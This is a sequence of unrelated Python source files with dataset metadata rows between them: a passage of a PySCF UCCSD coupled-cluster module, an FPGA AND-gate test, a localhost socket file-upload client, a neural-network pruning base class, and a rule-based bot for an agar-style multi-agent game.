eris.OVOO = eris.feri.create_dataset('OVOO', (noccb,nvirb,noccb,noccb), 'f8')
eris.OVOV = eris.feri.create_dataset('OVOV', (noccb,nvirb,noccb,nvirb), 'f8')
eris.OOVV = eris.feri.create_dataset('OOVV', (noccb,noccb,nvirb,nvirb), 'f8')
eris.OVVO = eris.feri.create_dataset('OVVO', (noccb,nvirb,nvirb,noccb), 'f8')
eris.OVVV = eris.feri.create_dataset('OVVV', (noccb,nvirb,nvirb*(nvirb+1)//2), 'f8')
#eris.VVVV = eris.feri.create_dataset('VVVV', (nvirb,nvirb,nvirb,nvirb), 'f8')
eris.ooOO = eris.feri.create_dataset('ooOO', (nocca,nocca,noccb,noccb), 'f8')
eris.ovOO = eris.feri.create_dataset('ovOO', (nocca,nvira,noccb,noccb), 'f8')
eris.ovOV = eris.feri.create_dataset('ovOV', (nocca,nvira,noccb,nvirb), 'f8')
eris.ooVV = eris.feri.create_dataset('ooVV', (nocca,nocca,nvirb,nvirb), 'f8')
eris.ovVO = eris.feri.create_dataset('ovVO', (nocca,nvira,nvirb,noccb), 'f8')
eris.ovVV = eris.feri.create_dataset('ovVV', (nocca,nvira,nvirb*(nvirb+1)//2), 'f8')
#eris.vvVV = eris.feri.create_dataset('vvVV', (nvira,nvira,nvirb,nvirb), 'f8')
eris.OVoo = eris.feri.create_dataset('OVoo', (noccb,nvirb,nocca,nocca), 'f8')
eris.OOvv = eris.feri.create_dataset('OOvv', (noccb,noccb,nvira,nvira), 'f8')
eris.OVvo = eris.feri.create_dataset('OVvo', (noccb,nvirb,nvira,nocca), 'f8')
eris.OVvv = eris.feri.create_dataset('OVvv', (noccb,nvirb,nvira*(nvira+1)//2), 'f8')
cput1 = time.clock(), time.time()
mol = mycc.mol
# <ij||pq> = <ij|pq> - <ij|qp> = (ip|jq) - (iq|jp)
tmpf = lib.H5TmpFile()
if nocca > 0:
ao2mo.general(mol, (orboa,moa,moa,moa), tmpf, 'aa')
buf = np.empty((nmoa,nmoa,nmoa))
for i in range(nocca):
lib.unpack_tril(tmpf['aa'][i*nmoa:(i+1)*nmoa], out=buf)
eris.oooo[i] = buf[:nocca,:nocca,:nocca]
eris.ovoo[i] = buf[nocca:,:nocca,:nocca]
eris.ovov[i] = buf[nocca:,:nocca,nocca:]
eris.oovv[i] = buf[:nocca,nocca:,nocca:]
eris.ovvo[i] = buf[nocca:,nocca:,:nocca]
eris.ovvv[i] = lib.pack_tril(buf[nocca:,nocca:,nocca:])
del(tmpf['aa'])
if noccb > 0:
buf = np.empty((nmob,nmob,nmob))
ao2mo.general(mol, (orbob,mob,mob,mob), tmpf, 'bb')
for i in range(noccb):
lib.unpack_tril(tmpf['bb'][i*nmob:(i+1)*nmob], out=buf)
eris.OOOO[i] = buf[:noccb,:noccb,:noccb]
eris.OVOO[i] = buf[noccb:,:noccb,:noccb]
eris.OVOV[i] = buf[noccb:,:noccb,noccb:]
eris.OOVV[i] = buf[:noccb,noccb:,noccb:]
eris.OVVO[i] = buf[noccb:,noccb:,:noccb]
eris.OVVV[i] = lib.pack_tril(buf[noccb:,noccb:,noccb:])
del(tmpf['bb'])
if nocca > 0:
buf = np.empty((nmoa,nmob,nmob))
ao2mo.general(mol, (orboa,moa,mob,mob), tmpf, 'ab')
for i in range(nocca):
lib.unpack_tril(tmpf['ab'][i*nmoa:(i+1)*nmoa], out=buf)
eris.ooOO[i] = buf[:nocca,:noccb,:noccb]
eris.ovOO[i] = buf[nocca:,:noccb,:noccb]
eris.ovOV[i] = buf[nocca:,:noccb,noccb:]
eris.ooVV[i] = buf[:nocca,noccb:,noccb:]
eris.ovVO[i] = buf[nocca:,noccb:,:noccb]
eris.ovVV[i] = lib.pack_tril(buf[nocca:,noccb:,noccb:])
del(tmpf['ab'])
if noccb > 0:
buf = np.empty((nmob,nmoa,nmoa))
ao2mo.general(mol, (orbob,mob,moa,moa), tmpf, 'ba')
for i in range(noccb):
lib.unpack_tril(tmpf['ba'][i*nmob:(i+1)*nmob], out=buf)
eris.OVoo[i] = buf[noccb:,:nocca,:nocca]
eris.OOvv[i] = buf[:noccb,nocca:,nocca:]
eris.OVvo[i] = buf[noccb:,nocca:,:nocca]
eris.OVvv[i] = lib.pack_tril(buf[noccb:,nocca:,nocca:])
del(tmpf['ba'])
buf = None
cput1 = logger.timer_debug1(mycc, 'transforming oopq, ovpq', *cput1)
if not mycc.direct:
ao2mo.full(mol, orbva, eris.feri, dataname='vvvv')
ao2mo.full(mol, orbvb, eris.feri, dataname='VVVV')
ao2mo.general(mol, (orbva,orbva,orbvb,orbvb), eris.feri, dataname='vvVV')
eris.vvvv = eris.feri['vvvv']
eris.VVVV = eris.feri['VVVV']
eris.vvVV = eris.feri['vvVV']
cput1 = logger.timer_debug1(mycc, 'transforming vvvv', *cput1)
return eris
def make_tau(t2, t1, r1, fac=1, out=None):
t1a, t1b = t1
r1a, r1b = r1
tau1aa = make_tau_aa(t2[0], t1a, r1a, fac, out)
tau1bb = make_tau_aa(t2[2], t1b, r1b, fac, out)
tau1ab = make_tau_ab(t2[1], t1, r1, fac, out)
return tau1aa, tau1ab, tau1bb
def make_tau_aa(t2aa, t1a, r1a, fac=1, out=None):
tau1aa = np.einsum('ia,jb->ijab', t1a, r1a)
tau1aa-= np.einsum('ia,jb->jiab', t1a, r1a)
tau1aa = tau1aa - tau1aa.transpose(0,1,3,2)
tau1aa *= fac * .5
tau1aa += t2aa
return tau1aa
def make_tau_ab(t2ab, t1, r1, fac=1, out=None):
t1a, t1b = t1
r1a, r1b = r1
tau1ab = np.einsum('ia,jb->ijab', t1a, r1b)
tau1ab+= np.einsum('ia,jb->ijab', r1a, t1b)
tau1ab *= fac * .5
tau1ab += t2ab
return tau1ab
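# _fp: rough floating-point operation count of one UCCSD iteration, obtained by
# summing the costs of the individual contractions (the vvvv, ovvv, ... blocks
# annotated below); it is a bookkeeping helper, not part of the algorithm itself.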
def _fp(nocc, nmo):
nocca, noccb = nocc
nmoa, nmob = nmo
nvira, nvirb = nmoa - nocca, nmob - noccb
# vvvv
fp = nocca**2 * nvira**4
fp += noccb**2 * nvirb**4
fp += nocca * nvira**2 * noccb * nvirb**2 * 2
# ovvv
fp += nocca**2 * nvira**3 * 2
fp += nocca**2 * nvira**3 * 2
fp += nocca**2 * nvira**3 * 2
fp += nocca**3 * nvira**3 * 2
fp += nocca**3 * nvira**2 * 2
# OVVV
fp += noccb**2 * nvirb**3 * 2
fp += noccb**2 * nvirb**3 * 2
fp += noccb**2 * nvirb**3 * 2
fp += noccb**3 * nvirb**3 * 2
fp += noccb**3 * nvirb**2 * 2
# ovVV
fp += nocca * nvira * noccb * nvirb**2 * 2
fp += nocca**2 * nvira * nvirb**2 * 2
fp += nocca * nvira * noccb * nvirb**2 * 2
fp += nocca * nvira * noccb * nvirb**2 * 2
fp += nocca**2 * nvira * noccb * nvirb**2 * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
# OVvv
fp += nocca * nvira**2 * noccb * nvirb * 2
fp += nvira**2 * noccb**2 * nvirb * 2
fp += nocca * nvira**2 * noccb * nvirb * 2
fp += nocca * nvira**2 * noccb * nvirb * 2
fp += nocca * nvira**2 * noccb**2 * nvirb * 2
fp += nocca * nvira * noccb**2 * nvirb * 2
fp += nocca**4 * nvira * 2
fp += nocca**4 * nvira**2 * 2
fp += nocca**4 * nvira**2 * 2
fp += nocca**3 * nvira**2 * 2
fp += nocca**3 * nvira**2 * 2
fp += nocca**2 * nvira**3 * 2
fp += nocca**3 * nvira**2 * 2
fp += nocca**3 * nvira**3 * 2
fp += nocca**2 * nvira**2 * noccb * nvirb * 2
fp += nocca**3 * nvira**2 * 2
fp += nocca**3 * nvira**2 * 2
fp += noccb**4 * nvirb * 2
fp += noccb**4 * nvirb**2 * 2
fp += noccb**4 * nvirb**2 * 2
fp += noccb**3 * nvirb**2 * 2
fp += noccb**3 * nvirb**2 * 2
fp += noccb**2 * nvirb**3 * 2
fp += noccb**3 * nvirb**2 * 2
fp += noccb**3 * nvirb**3 * 2
fp += noccb**2 * nvirb**2 * nocca * nvira * 2
fp += noccb**3 * nvirb**2 * 2
fp += noccb**3 * nvirb**2 * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += nocca**2 * noccb * nvirb**2 * 2
fp += noccb**2 * nvirb * nocca * nvira * 2
fp += noccb**2 * nvirb * nocca * nvira * 2
fp += noccb**2 * nocca * nvira**2 * 2
fp += nocca**2 * noccb**2 * nvirb * 2
fp += nocca**2 * nvira * noccb**2 * 2
fp += nocca**2 * nvira * noccb**2 * nvirb * 2
fp += nocca**2 * nvira * noccb**2 * nvirb * 2
fp += nocca * nvira**2 * noccb * nvirb * 2
fp += nocca * nvira * noccb * nvirb**2 * 2
fp += nocca * nvira**2 * noccb * nvirb * 2
fp += nocca * nvira * noccb * nvirb**2 * 2
fp += nocca**2 * nvira**2 * noccb * nvirb * 2
fp += nocca * nvira * noccb**2 * nvirb**2 * 2
fp += nocca**2 * nvira**2 * noccb * nvirb * 2
fp += nocca * nvira * noccb**2 * nvirb**2 * 2
fp += nocca**2 * nvira * noccb * nvirb**2 * 2
fp += nocca * nvira**2 * noccb**2 * nvirb * 2
fp += nocca * nvira * noccb**2 * nvirb * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += nocca * nvira * noccb**2 * nvirb * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += nocca**2 * noccb * nvirb**2 * 2
fp += nocca * nvira**2 * noccb**2 * 2
fp += nocca**3 * nvira**2 * 2
fp += nocca**3 * nvira**2 * 2
fp += noccb**3 * nvirb**2 * 2
fp += noccb**3 * nvirb**2 * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += nocca**2 * noccb * nvirb**2 * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += noccb**2 * nvirb * nocca * nvira * 2
fp += noccb**2 * nocca * nvira**2 * 2
fp += noccb**2 * nvirb * nocca * nvira * 2
fp += nocca**3 * nvira**3 * 2
fp += nocca**2 * nvira**2 * noccb * nvirb * 2
fp += noccb**3 * nvirb**3 * 2
fp += noccb**2 * nvirb**2 * nocca * nvira * 2
fp += nocca**2 * nvira**2 * noccb * nvirb * 2
fp += nocca * nvira * noccb**2 * nvirb**2 * 2
fp += nocca * nvira**2 * noccb**2 * nvirb * 2
fp += nocca**2 * nvira**2 * noccb * nvirb * 2
fp += nocca**2 * nvira**2 * noccb * nvirb * 2
fp += nocca**2 * nvira * noccb * nvirb**2 * 2
fp += nocca**2 * nvira**3 * 2
fp += noccb**2 * nvirb**3 * 2
fp += nocca * nvira * noccb * nvirb**2 * 2
fp += nocca * nvira**2 * noccb * nvirb * 2
fp += nocca**3 * nvira**2 * 2
fp += noccb**3 * nvirb**2 * 2
fp += nocca * nvira * noccb**2 * nvirb * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += nocca**2 * nvira**3 * 2
fp += noccb**2 * nvirb**3 * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += nocca * nvira * noccb**2 * nvirb * 2
return fp
if __name__ == '__main__':
import copy
from pyscf import scf
from pyscf import gto
mol = gto.Mole()
mol.atom = [['O', (0., 0., 0.)],
['O', (1.21, 0., 0.)]]
mol.basis = 'cc-pvdz'
mol.spin = 2
mol.build()
mf = scf.UHF(mol).run()
# Freeze 1s electrons
    # also acceptable: frozen = 4 or frozen = [2,2]
frozen = [[0,1], [0,1]]
ucc = UCCSD(mf, frozen=frozen)
eris = ucc.ao2mo()
ecc, t1, t2 = ucc.kernel(eris=eris)
print(ecc - -0.3486987472235819)
mol = gto.Mole()
mol.atom = [
[8 , (0. , 0. , 0.)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)]]
mol.basis = 'cc-pvdz'
mol.spin = 0
mol.build()
mf = scf.UHF(mol).run()
mycc = UCCSD(mf)
mycc.direct = True
ecc, t1, t2 = mycc.kernel()
print(ecc - -0.2133432712431435)
print(mycc.ccsd_t() - -0.003060021865720902)
e,v = mycc.ipccsd(nroots=8)
print(e[0] - 0.4335604332073799)
print(e[2] - 0.5187659896045407)
print(e[4] - 0.6782876002229172)
e,v = mycc.eaccsd(nroots=8)
print(e[0] - 0.16737886338859731)
print(e[2] - 0.24027613852009164)
print(e[4] - 0.51006797826488071)
e,v = mycc.eeccsd(nroots=4)
print(e[0] - 0.2757159395886167)
print(e[1] - 0.2757159395886167)
print(e[2] - 0.2757159395886167)
print(e[3] - 0.3005716731825082)
| 40.765991
| 89
| 0.586085
|
794e3018387494cb970c47ef0cdd929c7b8e2cb4
| 304
|
py
|
Python
|
tests/test_mantle/logic/mothball/reduceand2.py
|
splhack/loam
|
10b08bd622b7cfd63eabaec4729f6238e4521b30
|
[
"MIT"
] | 14
|
2017-10-08T09:16:10.000Z
|
2021-11-27T19:12:24.000Z
|
tests/test_mantle/logic/mothball/reduceand2.py
|
splhack/loam
|
10b08bd622b7cfd63eabaec4729f6238e4521b30
|
[
"MIT"
] | 7
|
2018-04-12T21:33:49.000Z
|
2018-08-21T22:14:20.000Z
|
tests/test_mantle/logic/mothball/reduceand2.py
|
splhack/loam
|
10b08bd622b7cfd63eabaec4729f6238e4521b30
|
[
"MIT"
] | 3
|
2018-07-24T04:55:02.000Z
|
2019-12-30T08:12:39.000Z
|
from magma import wire, compile, EndCircuit
from mantle import And
from loam.boards.icestick import IceStick
icestick = IceStick()
for i in range(2):
icestick.J1[i].input().on()
icestick.D5.on()
main = icestick.main()
and2 = And(2)
and2(main.J1[0], main.J1[1])
wire(and2.O, main.D5)
EndCircuit()
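# Hypothetical follow-up step (not part of the original test): the imported
# magma `compile` could be used to emit the circuit, e.g.
#   compile('build/reduceand2', main)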
| 17.882353
| 43
| 0.710526
|
794e309d5486036756cef688f28de112279e3e04
| 718
|
py
|
Python
|
day6/ftp-client.py
|
water-liu/automation
|
0a94b8e311f037a5624c3f376dcfdf67d8577dea
|
[
"Apache-2.0"
] | null | null | null |
day6/ftp-client.py
|
water-liu/automation
|
0a94b8e311f037a5624c3f376dcfdf67d8577dea
|
[
"Apache-2.0"
] | null | null | null |
day6/ftp-client.py
|
water-liu/automation
|
0a94b8e311f037a5624c3f376dcfdf67d8577dea
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# _*_coding:utf-8_*_
import socket
import sys
import os
ip_port = ('127.0.0.1', 9999)
sk = socket.socket()
sk.connect(ip_port)
container = {'key': '', 'data': ''}
while True:
inputdata = input('path:')
cmd, path = inputdata.split('|')
file_name = os.path.basename(path)
file_size = os.stat(path).st_size
sk.send((cmd + "|" + file_name + '|' + str(file_size)).encode())
send_size = 0
f = open(path, 'rb')
Flag = True
while Flag:
if send_size + 1024 > file_size:
data = f.read(file_size - send_size)
Flag = False
else:
data = f.read(1024)
send_size += 1024
sk.send(data)
f.close()
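# A minimal companion server sketch (assumption, not part of the original
# script) for the "cmd|filename|filesize" header followed by raw bytes that
# this client sends:
#
#   import socket
#   srv = socket.socket()
#   srv.bind(('127.0.0.1', 9999))
#   srv.listen(1)
#   conn, _ = srv.accept()
#   while True:
#       cmd, file_name, file_size = conn.recv(1024).decode().split('|')
#       received = 0
#       with open(file_name, 'wb') as f:
#           while received < int(file_size):
#               chunk = conn.recv(1024)
#               received += len(chunk)
#               f.write(chunk)
#
# Note: because the client writes the header and the data on the same stream
# without framing, a robust server would need to delimit the header explicitly.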
| 21.757576
| 68
| 0.559889
|
794e30d3827e430bc8665628c3220c37eb57d24c
| 6,545
|
py
|
Python
|
pruning/abstract.py
|
garion9013/shrinkbench
|
c460cbc371ef2673b2a3f8498ca7a8aeb60d78bb
|
[
"MIT"
] | null | null | null |
pruning/abstract.py
|
garion9013/shrinkbench
|
c460cbc371ef2673b2a3f8498ca7a8aeb60d78bb
|
[
"MIT"
] | null | null | null |
pruning/abstract.py
|
garion9013/shrinkbench
|
c460cbc371ef2673b2a3f8498ca7a8aeb60d78bb
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
from collections import OrderedDict
import numpy as np
import pandas as pd
from .mask import mask_module
from .modules import MaskedModule
from .utils import get_params
import tempfile, pathlib
import torch
class Pruning(ABC):
"""Base class for Pruning operations
"""
def __init__(self, model, inputs=None, outputs=None, **pruning_params):
"""Construct Pruning class
        Passed params are set as attributes for convenience and
        saved internally for __repr__
Arguments:
model {torch.nn.Module} -- Model for which to compute masks
inputs {torch.nn.Tensor} -- Sample inputs to estimate activation &| gradients
outputs {torch.nn.Tensor} -- Sample outputs to estimate activation &| gradients
Keyword Arguments:
**pruning_params {dict} -- [description]
"""
self.model = model
self.inputs = inputs
self.outputs = outputs
self.pruning_params = list(pruning_params.keys())
for k, v in pruning_params.items():
setattr(self, k, v)
if hasattr(self, "scheduler") and isinstance(self.scheduler, type):
self.scheduler_gen = self.scheduler(self, **self.scheduler_args)
@abstractmethod
def model_masks(self, prunable=None):
"""Compute masks for a given model
"""
# TODO Also accept a dataloader
pass
# return masks
def update_context(self, step):
# Update prunable parameters after backward pass
if hasattr(self, "scheduler_gen"):
# from generator class (stateful)
sparsity, next_waiting_steps = self.scheduler_gen.next(step)
elif hasattr(self, "scheduler"):
# from generator fn (stateless)
sparsity, next_waiting_steps = self.scheduler(self, step=step, **self.scheduler_args)
else:
raise AttributeError("Scheduler fn/obj is required to determine pruning step and amount")
self.compression = 1/(1-sparsity)
assert self.compression >= 1, "Unacceptable compression rate"
self.init(self.compression)
return next_waiting_steps
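    # apply(): one pruning event -- query the scheduler for the current target
    # compression, recompute the masks, and attach them to the model via
    # mask_module; returns the number of steps to wait until the next event.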
def apply(self, step):
next_waiting_steps = self.update_context(step)
masks = self.model_masks()
mask_module(self.model, masks)
return next_waiting_steps
@abstractmethod
def can_prune(self, module):
pass
def prunable_modules(self):
prunable = [module for module in self.model.modules() if self.can_prune(module)]
return prunable
def prunable_keys(self):
prunables = self.prunable_modules()
prunable_keys = []
for name, module in self.model.named_modules():
if module in prunables:
                # Assumes prunable layers always have both a weight and a bias
prunable_keys.append(name+".weight")
prunable_keys.append(name+".bias")
return prunable_keys
def capture_params(self, steps, only_prunable=True):
self._handle = tempfile.TemporaryDirectory()
tmp_path = pathlib.Path(self._handle.name)
tmp_path.mkdir(exist_ok=True, parents=True)
self.params_snapshot_path = tmp_path / f"{self.model.__class__.__name__}.{steps}"
params = self.model.state_dict()
if only_prunable:
params = dict(filter(lambda kv: kv[0] in self.prunable_keys(), params.items()))
torch.save({"model_state_dict":params}, self.params_snapshot_path)
# def weight_diff_norm(self):
# assert hasattr(self, "weights_path"), "Should be loaded with a pretrained model in advance"
#
# weights = torch.load(self.weights_path)["model_state_dict"]
# if list(weights.keys())[0].startswith('module.'):
# weights = {k[len("module."):]: v for k, v in weights.items()}
# self.load_state_dict(weights, strict=False)
# for k,v in weights.items():
# delta =
def reset_params(self):
assert hasattr(self, "params_snapshot_path"), "No saved model path (by self.captured_weights)"
weights = torch.load(self.params_snapshot_path)["model_state_dict"]
if list(weights.keys())[0].startswith('module.'):
weights = {k[len("module."):]: v for k, v in weights.items()}
self.model.load_state_dict(weights, strict=False)
def __repr__(self):
s = f"{self.__class__.__name__}("
for k in self.pruning_params:
s += f"{k}={repr(getattr(self, k))}, "
s = s[:-2] + ')'
return s
def __str__(self):
return repr(self)
def module_params(self, module):
return get_params(module)
def params(self, only_prunable=True, native=False):
if only_prunable:
return {module: get_params(module, native=native) for module in self.prunable}
else:
return {module: get_params(module, native=native) for module in self.model.modules()}
def summary(self):
rows = []
for name, module in self.model.named_modules():
for pname, param in module.named_parameters(recurse=False):
if isinstance(module, MaskedModule):
compression = 1/getattr(module, pname+'_mask').detach().cpu().numpy().mean()
else:
compression = 1
shape = param.detach().cpu().numpy().shape
rows.append([name, pname, compression, np.prod(shape), shape, self.can_prune(module)])
columns = ['module', 'param', 'comp', 'size', 'shape', 'prunable']
return pd.DataFrame(rows, columns=columns)
class LayerPruning(Pruning):
@abstractmethod
def layer_masks(self, module):
"""Instead of implementing masks for the entire model at once
User needs to specify a layer_masks fn that can be applied layerwise
Should return None is layer can't be masked
"""
pass
# return masks
def model_masks(self, prunable=None):
"""Compute masks using the said strategy for every module
This is a straight forward implementation that supports
strategies that prune each module independently
"""
masks = OrderedDict()
if prunable is None:
prunable = self.prunable_modules()
for module in prunable:
masks_ = self.layer_masks(module)
if masks_ is not None:
masks[module] = masks_
return masks
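# Illustrative subclass sketch (assumption, not part of the original file): a
# magnitude-based variant showing how can_prune/layer_masks plug in.  The mask
# format (a dict keyed by parameter name) is assumed here.
#
#   import torch.nn as nn
#
#   class MagnitudeLayerPruning(LayerPruning):
#       def can_prune(self, module):
#           return isinstance(module, (nn.Linear, nn.Conv2d))
#
#       def layer_masks(self, module):
#           w = module.weight.detach().abs()
#           keep = max(1, int(w.numel() / self.compression))   # weights to retain
#           threshold = w.flatten().kthvalue(w.numel() - keep + 1).values
#           return {'weight': (w >= threshold).to(w.dtype)}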
| 36.361111
| 102
| 0.628266
|
794e31ecc19277789a85f1457df975b39a845b96
| 12,473
|
py
|
Python
|
pettingzoo/agar/players/Bot.py
|
footoredo/PettingZoo
|
b48baf9ca459d72cdcb7013ef86c5fc470856081
|
[
"MIT"
] | null | null | null |
pettingzoo/agar/players/Bot.py
|
footoredo/PettingZoo
|
b48baf9ca459d72cdcb7013ef86c5fc470856081
|
[
"MIT"
] | null | null | null |
pettingzoo/agar/players/Bot.py
|
footoredo/PettingZoo
|
b48baf9ca459d72cdcb7013ef86c5fc470856081
|
[
"MIT"
] | null | null | null |
from pettingzoo.agar.players.Player import Player
import numpy as np
from pettingzoo.agar.modules import *
from pettingzoo.agar.entity.Cell import Cell
import random
from copy import deepcopy
class Bot(Player):
def __init__(self, gameServer, name='bot', id = None, pos = None):
super().__init__(gameServer, name, id, pos)
self.np_random = gameServer.np_random
assert self.np_random is not None
self.actionCooldown = 0
self.splitCooldown = 0
self.actionstamp = np.zeros(4)
def step(self, *kargs, **kwargs):
if len(self.cells) == 0:
self.isRemoved = True
if self.isRemoved:
return
if self.actionCooldown:
self.action[2] = 2
self.actionCooldown -= 1
self.action[:2] = self.actionstamp[:2]
return
self.actionCooldown = 5 # action_repeat=5
if self.splitCooldown:
self.splitCooldown -= 1
if self.np_random.rand() < 0.:
self.peace_step()
else:
self.aggressive_step()
self.mouse = self.centerPos.add(Vec2(self.action[0] * self.gameServer.config.serverViewBaseX, self.action[1] * self.gameServer.config.serverViewBaseY), 1)
if self.action[2] == 0:
self.pressSpace()
elif self.action[2] == 1:
self.pressW()
elif self.action[2] == 2:
pass
def peace_step(self):
visible_food = []
visible_virus = []
action = np.zeros(3)
has_enemy = False
for cell in self.viewNodes:
if cell.cellType == 1 or cell.cellType == 3: # food and ejected mass as visible_food
visible_food.append(cell)
elif cell.cellType == 0:
if cell.owner is not self and not self.gameServer.gameMode.haveTeams:
has_enemy = True
elif self.gameServer.gameMode.haveTeams and cell.owner.team != self.team:
has_enemy = True
elif cell.cellType ==2:
visible_virus.append(cell)
if not has_enemy and self.np_random.rand() < 0.05:
action[2] = 0
if visible_food and self.cells:
mincell = self.mincell()
maxcell = self.maxcell()
if len(self.cells) >= 14 and self.maxradius > self.gameServer.config.virusMinRadius * 1.15 and visible_virus:
                target = sorted(visible_virus, key=lambda c: (abs(c.position.x - maxcell.position.x) + abs(c.position.y - maxcell.position.y)) / c.mass + 10000 * (self.maxradius <= c.radius * 1.15))[0] # eat the nearest large virus below 1.15x of the largest cell (when I have >= 14 cells)
relative_position = target.position.clone().sub(maxcell.position)
action[2] = 2
elif len(self.cells) >= 4 and self.maxradius > self.gameServer.config.virusMinRadius * 1.15 and visible_virus and not has_enemy:
target = sorted(visible_virus, key=lambda c: (abs(c.position.x - maxcell.position.x) + abs(c.position.y - maxcell.position.y)) / c.mass + 10000 * (self.maxradius <= c.radius * 1.15))[0]
                relative_position = target.position.clone().sub(maxcell.position) # no enemy nearby, so eat the virus as well
action[2] = 2
else:
target = sorted(visible_food, key=lambda c: (abs(c.position.x - mincell.position.x) + abs(c.position.y - mincell.position.y)) / c.mass)[0]
# target = sorted(visible_food, key=lambda c: (abs(c.position.x - self.centerPos.x) + abs(c.position.y - self.centerPos.y)) / c.mass)[0]
relative_position = target.position.clone().sub(mincell.position) # eat food
action[0] = relative_position.x / max(abs(relative_position.x), abs(relative_position.y))
action[1] = relative_position.y / max(abs(relative_position.x), abs(relative_position.y))
self.actionstamp[:2] = action[:2]
elif self.cells:
action[:2] = np.random.randint(2, size=(2)) * 2 - 1
self.actionstamp[:2] = action[:2]
self.action = action
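    # dfs: 3-ply escape search.  Each ply tries 10 headings one move-radius away,
    # keeps positions whose clearance to every threatening cell in d_list stays
    # positive, and maximizes the minimal clearance reached at depth 2.  At depth 0
    # it returns (best clearance, first-step displacement) as the escape direction.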
def dfs(self, cell, d_list, deep, pos, opt):
n_p_list = []
b = 2 * np.pi * self.np_random.rand()
b = 0
for j in range(10):
theta = b + 2 * np.pi / 10 * j
next_pos = pos + np.array([np.cos(theta), np.sin(theta)]) * cell.getMoveR()
next_pos = self.gameServer.limit_pos(next_pos)
mi = 1e10
ok = True
for c in d_list:
dis = Vec2(c.position.x - next_pos[0], c.position.y - next_pos[1]).sqDist() - c.getMoveR() * (deep + 1) - c.radius
mi = min(mi, dis)
if dis + (cell.getMoveR() - c.getMoveR()) * (2 - deep) < opt[0]:
ok = False
break
if mi > 0 and ok:
n_p_list.append([next_pos, mi])
if len(n_p_list) == 0:
            if deep == 0:  # cannot escape (dfs in Bot)
return -1, [0., 0.]
return -1
n_p_list = sorted(n_p_list, key=lambda x: -x[1])
if deep == 2:
opt[0] = max(opt[0], n_p_list[0][1])
return n_p_list[0][1]
ma = -1
ans = [0., 0.]
for x in n_p_list:
old_opt = opt[0]
result = self.dfs(cell, d_list, deep + 1, x[0], opt)
ma = max(ma, result)
if deep == 0:
if old_opt != opt[0]:
ans = x[0] - pos
if deep == 0:
return ma, ans
return ma
def aggressive_step(self):
cell = self.maxcell()
result = Vec2(0, 0) # For splitting
action = np.zeros(3)
action[2] = 2. # now all agents try to keep their size
ab_x = cell.position.x / (self.config.borderWidth - cell.radius) + 0.5
ab_y = cell.position.y / (self.config.borderHeight - cell.radius) + 0.5
gamma = 1.03
danger = False
very_danger = False
danger_list = []
for check in self.viewNodes:
if check.cellType == 0 and check.radius > cell.radius * 1.15:
danger = True
dis = Vec2(check.position.x - cell.position.x, check.position.y - cell.position.y).sqDist()
if dis <= self.config.borderWidth / 6.5 and check.pID < self.gameServer.env.num_agents:
very_danger = True
danger_list.append(check)
if very_danger:
ma, ans = self.dfs(cell, danger_list, 0, np.array([cell.position.x, cell.position.y]), [-1])
result.x = ans[0]
result.y = ans[1]
self.action = np.zeros(3)
self.action[2] = 2
self.action[0] = result.x
self.action[1] = result.y
return
if danger:
self.viewNodes.append(Cell(self.gameServer, None, Vec2(-gamma * self.config.borderWidth / 2, -gamma * self.config.borderHeight / 2), cell.radius))
self.viewNodes.append(Cell(self.gameServer, None, Vec2( gamma * self.config.borderWidth / 2, -gamma * self.config.borderHeight / 2), cell.radius))
self.viewNodes.append(Cell(self.gameServer, None, Vec2(-gamma * self.config.borderWidth / 2, gamma * self.config.borderHeight / 2), cell.radius))
self.viewNodes.append(Cell(self.gameServer, None, Vec2( gamma * self.config.borderWidth / 2, gamma * self.config.borderHeight / 2), cell.radius))
for check in self.viewNodes:
if check.owner == self:
continue
# Get attraction of the cells - avoid larger cells, viruses and same team cells
influence = 0
if check.cellType == -1:
if check.owner is None: # corner
influence = -check.radius
elif check.cellType == 0: # Player cell
if self.gameServer.gameMode.haveTeams and cell.owner.team == check.owner.team:
# Same team cell
influence = 0
elif cell.radius > check.radius * 1.15:
# Can eat it
influence = check.radius * 2.5
elif check.radius > cell.radius * 1.15:
# Can eat me
influence = -check.radius
else:
influence = -(check.radius / cell.radius) / 3
elif check.cellType == 1:
# Food
influence = 1
elif check.cellType == 2:
# Virus/Mothercell
if cell.radius > check.radius * 1.15:
# Can eat it
if len(self.cells) == self.gameServer.config.playerMaxCells:
# Won't explode
influence = check.radius * 2.5
elif len(self.cells) >= self.gameServer.config.playerMaxCells - 6:
influence = check.radius * 2
else:
# Can explode
influence = -1
elif check.isMotherCell and check.radius > cell.radius * 1.15:
# can eat me
influence = -1
elif check.cellType == 3:
# Ejected mass
if cell.radius > check.radius * 1.15:
influence = check.radius
# Apply influence if it isn't 0
if influence == 0:
continue
displacement = Vec2(check.position.x - cell.position.x, check.position.y - cell.position.y)
# Figure out distance between cells
distance = displacement.sqDist()
if distance == 0:
print('bug in Bot', check.owner, self)
continue
if influence < 0:
# Get edge distance
distance -= cell.radius + check.radius
                # The farther they are the smaller the influence is
if distance < 1:
                    distance = 1  # Avoid NaN and positive influence with negative distance & attraction
influence /= distance
# Splitting conditions
if check.cellType == 0:
checkmax = check.owner.maxcell()
selfmin = self.mincell()
if checkmax and cell.radius / 1.414 > checkmax.radius * 1.15 and selfmin.radius > checkmax.radius and not self.splitCooldown and 820 - cell.radius / 2 - checkmax.radius >= distance:
# Splitkill the target
self.splitCooldown = 10
relative = checkmax.position.clone().sub(cell.position)
if relative.sqDist():
relative = relative.normalize()
action[0] = relative.x
action[1] = relative.y
action[2] = 0
self.action = action
return
else:
result.add(displacement.normalize(), influence)
else:
# Produce force vector exerted by self entity on the cell
result.add(displacement.normalize(), influence)
if danger:
self.viewNodes = self.viewNodes[:-4]
ab_x = cell.position.x / (self.config.borderWidth - cell.radius) + 0.5
ab_y = cell.position.y / (self.config.borderHeight - cell.radius) + 0.5
def sigmoid(x):
x -= 5
return 1. / (1. + np.exp(-x))
beta = 3
